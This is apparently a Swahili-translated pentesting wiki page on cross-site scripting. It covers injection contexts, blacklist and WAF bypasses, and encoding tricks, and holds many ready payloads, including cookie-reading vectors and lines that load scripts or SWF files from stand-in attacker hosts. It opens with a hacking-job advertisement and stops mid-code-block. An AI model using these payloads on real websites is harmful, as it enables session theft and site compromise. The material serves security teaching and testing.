# XSS (Cross Site Scripting)

<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Ikiwa una nia ya **kazi ya udukuzi** na kudukua yasiyodukuliwa - **tunakupa kazi!** (_ujuzi wa Kipolishi wa kuandika na kusema unahitajika_).

{% embed url="https://www.stmcyber.com/careers" %}

## Mbinu

1. Angalia ikiwa **thamani yoyote unayoidhibiti** (_parameta_, _njia_, _vichwa vya habari_?, _vidakuzi_?) inaonyeshwa katika HTML au **kutumiwa** na **msimbo wa JS**.
2. **Pata muktadha** ambapo inaonyeshwa/inatumika.
3. Ikiwa **inaonyeshwa**
1. Angalia **herufi zipi unaweza kutumia** na kulingana na hilo, andaa mzigo:
1. Katika **HTML ghafi**:
1. Je, unaweza kuunda vitambulisho vipya vya HTML?
2. Je, unaweza kutumia matukio au sifa zinazounga mkono itifaki ya `javascript:`?
3. Je, unaweza kukiuka ulinzi?
4. Je, yaliyomo ya HTML inachambuliwa na injini yoyote ya JS ya upande wa mteja (_AngularJS_, _VueJS_, _Mavo_...), unaweza kutumia [**Uingizaji wa Kielelezo cha Upande wa Mteja**](../client-side-template-injection-csti.md).
5. Ikiwa huwezi kuunda vitambulisho vya HTML vinavyotekeleza msimbo wa JS, unaweza kutumia [**Kutundikwa kwa Alama - Uingizaji wa HTML bila skripti**](../dangling-markup-html-scriptless-injection/)?
2. Ndani ya **kitambulisho cha HTML**:
1. Je, unaweza kutoka kwenye muktadha wa HTML ghafi?
2. Je, unaweza kuunda matukio/sifa mpya za kutekeleza msimbo wa JS?
3. Je, sifa ambapo umekwama inaunga mkono utekelezaji wa JS?
4. Je, unaweza kukiuka ulinzi?
3. Ndani ya **msimbo wa JavaScript**:
1. Je, unaweza kuepuka lebo ya `<script>`?
2. Je, unaweza kuepuka herufi na kutekeleza msimbo tofauti wa JS?
3. Je, matokeo yako ni katika herufi za kielezo \`\`?
4. Je, unaweza kukiuka ulinzi?
4. **Kazi** ya JavaScript **inayotekelezwa**
1. Unaweza kuonyesha jina la kazi ya kutekelezwa. mf.: `?callback=alert(1)`
4. Ikiwa **inatumika**:
1. Unaweza kutumia **DOM XSS**, angalia jinsi matokeo yako yanavyodhibitiwa na ikiwa matokeo yako **yanayodhibitiwa yanatumika na sinki yoyote**.

Unapofanya kazi kwenye XSS ngumu unaweza kupata kuvutia kujua kuhusu:

{% content-ref url="debugging-client-side-js.md" %}
[debugging-client-side-js.md](debugging-client-side-js.md)
{% endcontent-ref %}

## Thamani Zilizoonyeshwa

Ili kufaidika kikamilifu na XSS jambo la kwanza unahitaji kupata ni **thamani unayoidhibiti inayoonyeshwa** kwenye ukurasa wa wavuti.

* **Kati kati inayoonyeshwa**: Ikiwa unagundua kuwa thamani ya parameta au hata njia inaonyeshwa kwenye ukurasa wa wavuti unaweza kutumia **Reflected XSS**.
* **Imehifadhiwa na inayoonyeshwa**: Ikiwa unagundua kuwa thamani unayoidhibiti imehifadhiwa kwenye seva na inaonyeshwa kila wakati unapofikia ukurasa unaweza kutumia **Stored XSS**.
* **Kufikiwa kupitia JS**: Ikiwa unagundua kuwa thamani unayoidhibiti inatumika kwa kutumia JS unaweza kutumia **DOM XSS**.

## Muktadha

Unapojaribu kutumia XSS jambo la kwanza unahitaji kujua ni **wapi matokeo yako yanayoonyeshwa**. Kulingana na muktadha, utaweza kutekeleza msimbo wa JS kwa njia tofauti.

### HTML Ghafi

Ikiwa matokeo yako yanaonyeshwa kwenye **HTML ghafi** unahitaji kutumia baadhi ya **kitambulisho cha HTML** ili kutekeleza msimbo wa JS: `<img , <iframe , <svg , <script` ... hizi ni baadhi tu ya vitambulisho vingi vya HTML unavyoweza kutumia.\
Pia, kumbuka [Uingizaji wa Kielelezo cha Upande wa Mteja](../client-side-template-injection-csti.md).

### Ndani ya Sifa za Vitambulisho vya HTML

Ikiwa matokeo yako yanaonyeshwa ndani ya thamani ya sifa ya lebo unaweza jaribu:

1. Kujaribu **kutoka kwenye sifa na kutoka kwenye lebo** (kisha utakuwa kwenye HTML ghafi) na kuunda kitambulisho kipya cha HTML cha kutumia: `"><img [...]`
2. Ikiwa **unaweza kutoka kwenye sifa lakini si kutoka kwenye lebo** (`>` imekodishwa au imefutwa), kulingana na lebo unaweza **kuunda tukio** linalotekeleza msimbo wa JS: `" autofocus onfocus=alert(1) x="`
3. Ikiwa **hauwezi kutoka kwenye sifa** (`"` inakodishwa au imefutwa), basi kulingana na **sifa ipi** thamani yako inaonyeshwa **ikiwa unadhibiti thamani yote au sehemu tu** unaweza kutumia. Kwa **mfano**, ikiwa unadhibiti tukio kama `onclick=` utaweza kufanya iwekeze msimbo wa aina yoyote unapobonyeza. Mfano mwingine wa kuvutia ni sifa `href`, ambapo unaweza kutumia itifaki ya `javascript:` kutekeleza msimbo wa aina yoyote: **`href="javascript:alert(1)"`**
4. Ikiwa matokeo yako yanaonyeshwa ndani ya "**vitambulisho visivyoweza kutumiwa**" unaweza kujaribu mbinu ya **`accesskey`** kutumia mwanya huo (utahitaji aina fulani ya mhandisi wa kijamii kufaidika na hii): **`" accesskey="x" onclick="alert(1)" x="`**

### Ndani ya Msimbo wa JavaScript

Katika kesi hii matokeo yako yanaonyeshwa kati ya **`<script> [...] </script>`** vitambulisho vya ukurasa wa HTML, ndani ya faili ya `.js` au ndani ya sifa inayotumia itifaki ya **`javascript:`**:

* Ikiwa yanaonyeshwa kati ya **`<script> [...] </script>`** vitambulisho, hata kama matokeo yako yamo ndani ya aina yoyote ya alama, unaweza kujaribu kuingiza `</script>` na kutoka kwenye muktadha huu. Hii inafanya kazi kwa sababu **kivinjari kitachambua kwanza vitambulisho vya HTML** na kisha yaliyomo, kwa hivyo, haitagundua kuwa alama yako ya kuingiza `</script>` iko ndani ya msimbo wa HTML.
* Ikiwa yanaonyeshwa **ndani ya herufi ya JS** na mbinu ya mwisho haifanyi kazi unahitaji **kutoka** kwenye herufi, **kutekeleza** msimbo wako na **kujenga upya** msimbo wa JS (ikiwa kuna kosa, hautatekelezwa:
* `'-alert(1)-'`
* `';-alert(1)//`
* `\';alert(1)//`
* Ikiwa yanaonyeshwa ndani ya kielelezo cha herufi unaweza **ingiza mielekeo ya JS** kwa kutumia sintaksia ya `${ ... }`: `` var greetings = `Hello, ${alert(1)}` ``
* **Ukodishaji wa Unicode** unafanya kazi kuandika **msimbo wa JS halali**:
```javascript
\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)
```
#### Kukweka Javascript

Kukweka Javascript inahusu fursa ya **kutangaza kazi, mizani au darasa baada ya kutumiwa ili uweze kutumia hali ambapo XSS inatumia variables au functions ambazo hazijatangazwa.**\
**Angalia ukurasa ufuatao kwa maelezo zaidi:**

{% content-ref url="js-hoisting.md" %}
[js-hoisting.md](js-hoisting.md)
{% endcontent-ref %}

### Kazi ya Javascript

Kurasa kadhaa za wavuti zina **makutano ambayo hukubali kama parameta jina la kazi ya kutekeleza**. Mfano wa kawaida unaoweza kuonekana ni kama: `?callback=callbackFunc`.

Njia nzuri ya kugundua ikiwa kitu kilichotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni **kubadilisha thamani ya parameta** (kwa mfano kuwa 'Vulnerable') na kutazama kwenye konsoli kwa makosa kama:

![](<../../.gitbook/assets/image (651) (2).png>)

Ikiwa ni dhaifu, unaweza **kuzindua onyo** kwa kutuma thamani: **`?callback=alert(1)`**. Walakini, ni kawaida sana kwamba makutano haya yata **thibitisha maudhui** ili kuruhusu herufi, nambari, alama za mshale na mistari (**`[\w\._]`**).

Hata hivyo, hata na kizuizi hicho bado inawezekana kutekeleza baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia herufi halali hizo kufikia kipengele chochote katika DOM:

![](<../../.gitbook/assets/image (662).png>)

Baadhi ya kazi muhimu kwa hili:
```
firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement
```
Unaweza pia kujaribu **kuzindua kazi za Javascript** moja kwa moja: `obj.sales.delOrders`.

Walakini, kwa kawaida vituo vinavyotekeleza kazi iliyotajwa ni vituo bila DOM ya kuvutia sana, **kurasa nyingine katika asili ile ile** zitakuwa na **DOM yenye kuvutia zaidi** kufanya vitendo zaidi.

Kwa hivyo, ili **kutumia udhaifu huu katika DOM tofauti** ilitengenezwa unyanyasaji wa **utekelezaji wa Mbinu ya Asili Iliyofanana (SOME)**:

{% content-ref url="some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md](some-same-origin-method-execution.md)
{% endcontent-ref %}

### DOM

Kuna **msimbo wa JS** ambao unatumia **bila usalama** baadhi ya **data inayodhibitiwa na mshambuliaji** kama vile `location.href`. Mshambuliaji, anaweza kutumia hii kutekeleza msimbo wa JS wa aina yoyote.

{% content-ref url="dom-xss.md" %}
[dom-xss.md](dom-xss.md)
{% endcontent-ref %}

### **Universal XSS**

Aina hii ya XSS inaweza kupatikana **mahali popote**. Hazitegemei tu unyanyasaji wa mteja wa programu ya wavuti bali kwenye **muktadha wowote**. Aina hii ya **utekelezaji wa JavaScript wa aina yoyote** inaweza hata kutumiwa kwa **RCE**, **kusoma** **faili za aina yoyote** kwenye wateja na seva, na zaidi.\
Baadhi ya **mfano**:

{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
{% endcontent-ref %}

{% content-ref url="../../network-services-pentesting/pentesting-web/electron-desktop-apps/" %}
[electron-desktop-apps](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
{% endcontent-ref %}

## Kupitisha WAF kwa kuweka picha

![kutoka https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)

## Kuingiza ndani ya HTML ghafi

Wakati matokeo yako yanarudishwa **ndani ya ukurasa wa HTML** au unaweza kutoroka na kuingiza msimbo wa HTML katika muktadha huu, **jambo la kwanza** unalohitaji kufanya ni kuangalia ikiwa unaweza kutumia `<` kuunda vitambulisho vipya: Jaribu tu **kurudisha** **herufi** hiyo na uangalie ikiwa ina **kodishwa kwa HTML** au **kufutwa** au ikiwa ina **kurudishwa bila mabadiliko**. **Katika kesi ya mwisho tu utaweza kutumia udhaifu huu**.\
Kwa kesi hizi pia **kumbuka** [**Uingizaji wa Kigezo cha Upande wa Mteja**](../client-side-template-injection-csti.md)**.**\
_**Maelezo: Maoni ya HTML yanaweza kufungwa kwa kutumia**** ****`-->`**** ****au**** ****`--!>`**_

Katika kesi hii na ikiwa hakuna orodha nyeusi/orodha nyeupe inayotumiwa, unaweza kutumia mizigo kama:
```html
<script>alert(1)</script>
<img src=x onerror=alert(1) />
<svg onload=alert('XSS')>
```
Lakini, ikiwa orodha nyeusi/nyeupe ya vitambulisho/vipengele inatumika, utahitaji **kufanya nguvu ya kutumia vitambulisho** unavyoweza kuunda.\
Baada ya **kupata vitambulisho vilivyoidhinishwa**, utahitaji **kufanya nguvu ya kutumia vipengele/matukio** ndani ya vitambulisho halali ulivyopata kuona jinsi unavyoweza kushambulia muktadha.

### Nguvu ya Vitambulisho/Matukio

Nenda kwenye [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) na bonyeza _**Nakili vitambulisho kwenye ubao**_. Kisha, tuma vyote kwa kutumia Burp intruder na angalia kama kuna vitambulisho vilivyogunduliwa kuwa vichafu na WAF. Baada ya kugundua vitambulisho unavyoweza kutumia, unaweza **kufanya nguvu ya kutumia matukio yote** kwa kutumia vitambulisho halali (kwenye ukurasa huo huo wa wavuti bonyeza _**Nakili matukio kwenye ubao**_ na fuata utaratibu huo huo kama awali).

### Vitambulisho vya Kibinafsi

Ikiwa hukupata kitambulisho halali la HTML, unaweza kujaribu **kuunda kitambulisho cha kibinafsi** na kutekeleza msimbo wa JS na sifa ya `onfocus`. Katika ombi la XSS, unahitaji kumaliza URL na `#` ili kufanya ukurasa **uelekeze kwenye kitu hicho** na **kutekeleza** msimbo:
```
/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
```
### Kuepuka Orodha ya Kupiga Marufuku

Ikiwa aina fulani ya orodha ya kupiga marufuku inatumika, unaweza jaribu kuipita kwa mbinu za kipumbavu:
```javascript
//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG

//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>

//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09

//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>

//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>

//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //

//Extra open
<<script>alert("XSS");//<</script>

//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">

//Using `` instead of parenthesis
onerror=alert`1`

//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
```
### Kupitisha urefu (XSS ndogo)

{% hint style="info" %}
**XSS ndogo zaidi kwa mazingira tofauti** mzigo [**unaweza kupatikana hapa**](https://github.com/terjanq/Tiny-XSS-Payloads) na [**hapa**](https://tinyxss.terjanq.me).
{% endhint %}
```html
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``>
<script src=//aa.es>
<script src=//℡㏛.pw>
```
Ya mwisho ni kutumia wahusika 2 wa Unicode ambao hufikia 5: telsr\
Zaidi ya wahusika hawa wanaweza kupatikana [hapa](https://www.unicode.org/charts/normalization/).\
Kuona ni wahusika gani wamevunjwa vipande, angalia [hapa](https://www.compart.com/en/unicode/U+2121).

### Bonyeza XSS - Clickjacking

Ikiwa ili kutumia udhaifu unahitaji **mtumiaji abonyeze kiungo au fomu** na data iliyopangiliwa mapema unaweza kujaribu [**kutumia Clickjacking**](../clickjacking.md#xss-clickjacking) (ikiwa ukurasa una udhaifu).

### Haiwezekani - Dangling Markup

Ikiwa unafikiria tu kwamba **haiwezekani kuunda lebo ya HTML na sifa ya kutekeleza msimbo wa JS**, unapaswa kuangalia [**Danglig Markup**](../dangling-markup-html-scriptless-injection/) kwa sababu unaweza **kutumia** udhaifu **bila** kutekeleza **msimbo wa JS**.

## Kuingiza ndani ya lebo ya HTML

### Ndani ya lebo/kutoroka kutoka thamani ya sifa

Ikiwa uko **ndani ya lebo ya HTML**, jambo la kwanza unaloweza kujaribu ni **kutoroka** kutoka kwenye lebo na kutumia baadhi ya mbinu zilizotajwa katika [sehemu iliyopita](./#injecting-inside-raw-html) ili kutekeleza msimbo wa JS.\
Ikiwa **hauwezi kutoroka kutoka kwenye lebo**, unaweza kuunda sifa mpya ndani ya lebo kujaribu kutekeleza msimbo wa JS, kwa mfano kutumia mzigo kama huu (_tambua kwamba katika mfano huu alama za nukuu mara mbili hutumiwa kutoroka kutoka kwenye sifa, hautahitaji hizo ikiwa matokeo yako yanarejelewa moja kwa moja ndani ya lebo_):
```bash
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
```
**Matukio ya Mtindo**
```python
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
```
### Ndani ya sifa

Hata kama **hauwezi kutoroka kutoka kwa sifa** (`"` inakodishwa au kufutwa), kutegemea **sifa ipi** thamani yako inaonyeshwa **ikiwa una udhibiti wa thamani yote au sehemu tu** unaweza kuibua. Kwa **mfano**, ikiwa una udhibiti wa tukio kama `onclick=`, utaweza kuifanya itekeleze nambari ya kupindukia wakati inapobonyezwa.\
Mfano mwingine wa kuvutia ni sifa `href`, ambapo unaweza kutumia itifaki ya `javascript:` kutekeleza nambari ya kupindukia: **`href="javascript:alert(1)"`**

**Kupita ndani ya tukio kwa kutumia uendeshaji wa HTML encoding/URL encode**

**Vichwa vya habari vilivyokodishwa vya HTML** ndani ya thamani ya sifa za vitambulisho vya HTML vinakodishwa wakati wa uendeshaji. Kwa hivyo kitu kama hicho kitakuwa halali (mzigo uko kwa herufi nene): `<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Rudi </a>`

Tafadhali kumbuka **aina yoyote ya uendeshaji wa HTML ni halali**:
```javascript
//HTML entities
&apos;-alert(1)-&apos;
//HTML hex without zeros
&#x27-alert(1)-&#x27
//HTML hex with zeros
&#x00027-alert(1)-&#x00027
//HTML dec without zeros
&#39-alert(1)-&#39
//HTML dec with zeros
&#00039-alert(1)-&#00039

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">a</a>
```
**Tafadhali kumbuka kuwa URL encode pia itafanya kazi:**
```python
<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
```
**Kupita ndani ya tukio kutumia msimbaji wa Unicode**
```javascript
//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
```
### Itifaki Maalum Ndani ya sifa

Hapo unaweza kutumia itifaki za **`javascript:`** au **`data:`** mahali fulani ili **kutekeleza msimbo wa JS wa kiholela**. Baadhi itahitaji ushirikiano wa mtumiaji na nyingine hazitahitaji.
```javascript
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
java        //Note the new line
script:alert(1)

data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```
**Maeneo ambapo unaweza kuingiza itifaki hizi**

**Kwa ujumla** itifaki ya `javascript:` inaweza **kutumika katika lebo yoyote inayokubali sifa ya `href`** na **katika** lebo nyingi zinazokubali **sifa ya `src`** (lakini sio `<img`)
```markup
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>

<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>

//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">
```
**Mbinu nyingine za kuficha**

_**Katika kesi hii, ujazo wa HTML na mbinu ya ujazo wa Unicode kutoka sehemu iliyopita ni sahihi pia kwani uko ndani ya sifa.**_
```javascript
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```
Zaidi ya hayo, kuna **mchezo mzuri** mwingine kwa hali hizi: **Hata kama kuingiza kwako ndani ya `javascript:...` inakuwa imefanyiwa URL encoding, itakuwa URL decoded kabla ya kutekelezwa.** Kwa hivyo, ikiwa unahitaji **kutoroka** kutoka kwa **herufi** kwa kutumia **alama ya nukta moja** na unaona kwamba **imefanyiwa URL encoding**, kumbuka kwamba **hauna maana**, itatafsiriwa kama **alama ya nukta moja** wakati wa **utekelezaji**.
```javascript
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
```
Tafadhali kumbuka kwamba ikiwa unajaribu **kutumia zote mbili** `URLencode + HTMLencode` kwa mpangilio wowote wa kuweka **payload** haitafanya kazi, lakini unaweza **kuzichanganya ndani ya payload**.

**Kutumia Hex na Octal encode na `javascript:`**

Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` (angalau) kutangaza **vitambulisho vya HTML kutekeleza JS**:
```javascript
//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />

//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
```
### Kubadilisha tabu ya nabbing
```javascript
<a target="_blank" rel="opener"
```
Ikiwa unaweza kuingiza URL yoyote katika tag ya **`<a href=`** isiyo na mpangilio ambayo ina sifa za **`target="_blank" na rel="opener"`**, angalia **ukurasa ufuatao kuchexploit tabia hii**:

{% content-ref url="../reverse-tab-nabbing.md" %}
[reverse-tab-nabbing.md](../reverse-tab-nabbing.md)
{% endcontent-ref %}

### Kwenye Wapitishaji wa Tukio Bypass

Kwanza kabisa angalia ukurasa huu ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) kwa **"on" wapitishaji wa tukio** wenye manufaa.\
Kwa hali ambapo kuna orodha nyeusi inayozuia kutengeneza wapitishaji hawa hata unaweza kujaribu kubadilisha:
```javascript
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>

//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
```
### XSS katika "Vitambulisho visivyoweza kudukuliwa" (kuingiza siri, kiungo, kanoni, meta)

Kutoka [**hapa**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **sasa inawezekana kutumia vibali vilivyofichwa na:**
```html
<button popvertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle=alert(1)>
```
Na kwenye **meta tags**:
```html
<!-- Injection inside meta attribute-->
<meta name="apple-mobile-web-app-title" content=""Twitter popover id="newsletter" onbeforetoggle=alert(2) />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
```
Kutoka [**hapa**](https://portswigger.net/research/xss-in-hidden-input-fields): Unaweza kutekeleza **XSS payload ndani ya sifa iliyofichwa**, ikiwa unaweza **kumshawishi** **mlemavu** kubonyeza **kombinisheni ya funguo**. Kwenye Firefox Windows/Linux kombinisheni ya funguo ni **ALT+SHIFT+X** na kwenye OS X ni **CTRL+ALT+X**. Unaweza kubainisha kombinisheni tofauti ya funguo kwa kutumia funguo tofauti katika sifa ya ufikivu. Hapa kuna vector:
```markup
<input type="hidden" accesskey="X" onclick="alert(1)">
```
**Mzigo wa XSS utakuwa kama huu: `" accesskey="x" onclick="alert(1)" x="`**

### Kuepuka Orodha ya Kupiga marufuku

Mbinu kadhaa za kutumia nambari tofauti za encoding tayari zimefunuliwa ndani ya sehemu hii. Rudi nyuma kujifunza unaweza kutumia wapi:

* **Ukodishaji wa HTML (lebo za HTML)**
* **Ukodishaji wa Unicode (inaweza kuwa nambari halali ya JS):** `\u0061lert(1)`
* **Ukodishaji wa URL**
* **Ukodishaji wa Hex na Octal**
* **Ukodishaji wa data**

**Kuepuka kwa lebo na sifa za HTML**

Soma [Kuepuka Orodha ya Kupiga marufuku ya sehemu iliyopita](./#blacklist-bypasses).

**Kuepuka kwa nambari ya JavaScript**

Soma [Kuepuka kwa Kupiga marufuku ya JavaScript ya sehemu ifuatayo](./#javascript-bypass-blacklists-techniques).

### CSS-Gadgets

Ikiwa umepata **XSS katika sehemu ndogo sana** ya wavuti inayohitaji aina fulani ya mwingiliano (labda kiungo kidogo chini kwenye mguu wa ukurasa na kipengele cha onmouseover), unaweza **kujaribu kubadilisha nafasi ambayo kipengele hicho kinachukua** ili kuongeza uwezekano wa kiungo hicho kufanya kazi.

Kwa mfano, unaweza kuongeza mtindo fulani kwenye kipengele kama: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`

Lakini, ikiwa WAF inachuja sifa ya mtindo, unaweza kutumia CSS Styling Gadgets, hivyo ikiwa unapata, kwa mfano

> .jaribio {display:block; color: blue; width: 100%\}

na

> \#kitambulisho {juu: 0; font-family: Tahoma;}

Sasa unaweza kubadilisha kiungo chetu na kukiweka katika fomu

> \<a href="" id=kitambulisho class=jaribio onclick=alert() a="">

Hila hii ilitolewa kutoka [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)

## Kuingiza ndani ya nambari ya JavaScript

Katika kesi hizi **kuingiza** yako itakuwa **inajitokeza ndani ya nambari ya JS** ya faili ya `.js` au kati ya `<script>...</script>` tags au kati ya matukio ya HTML ambayo yanaweza kutekeleza nambari ya JS au kati ya sifa ambazo zinakubali itifaki ya `javascript:`.

### Kuepuka lebo ya \<script>

Ikiwa nambari yako imeingizwa ndani ya `<script> [...] var input = 'data inayojitokeza' [...] </script>` unaweza kwa urahisi **kuepuka kufunga lebo ya `<script>`**:
```javascript
</script><img src=1 onerror=alert(document.domain)>
```
Tafadhali elewa kwamba katika mfano huu **hatujafunga alama ya nukta moja**. Hii ni kwa sababu **uparaganyaji wa HTML hufanywa kwanza na kivinjari**, ambayo inajumuisha kutambua vipengele vya ukurasa, ikiwa ni pamoja na vitalu vya script. Uparaganyaji wa JavaScript kuelewa na kutekeleza mistari iliyofungwa hufanywa baadaye.

### Ndani ya msimbo wa JS

Ikiwa `<>` inasanitizwa unaweza bado **kutoroka kutoka kwa herufi** ambapo mwingiliano wako uko **umejumuishwa** na **kutekeleza JS ya kupindukia**. Ni muhimu **kurekebisha muundo wa JS**, kwa sababu ikiwa kuna makosa yoyote, msimbo wa JS hautatekelezwa:
```
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
```
### Template literals \`\`

Ili kujenga **maneno** mbali na alama za nukta moja na mbili, JS pia inakubali **alama ya kurudi nyuma** **` `` `** . Hii inajulikana kama template literals kwani inaruhusu **kuweka eshesheni za JS** kwa kutumia sintaksia `${ ... }`.

Kwa hivyo, ikiwa utagundua kuwa matokeo yako yanarudi ndani ya neno la JS linalotumia alama ya kurudi nyuma, unaweza kutumia sintaksia `${ ... }` kutekeleza **msimbo wa JS wa kiholela**:

Hii inaweza **kutumiwa vibaya** kwa kutumia:
```javascript
`${alert(1)}`
`${`${`${`${alert(1)}`}`}`}`
```

```````````````javascript
// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop(){return loop}
loop``````````````
```````````````
### Utekelezaji wa nambari iliyofichwa
```markup
<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
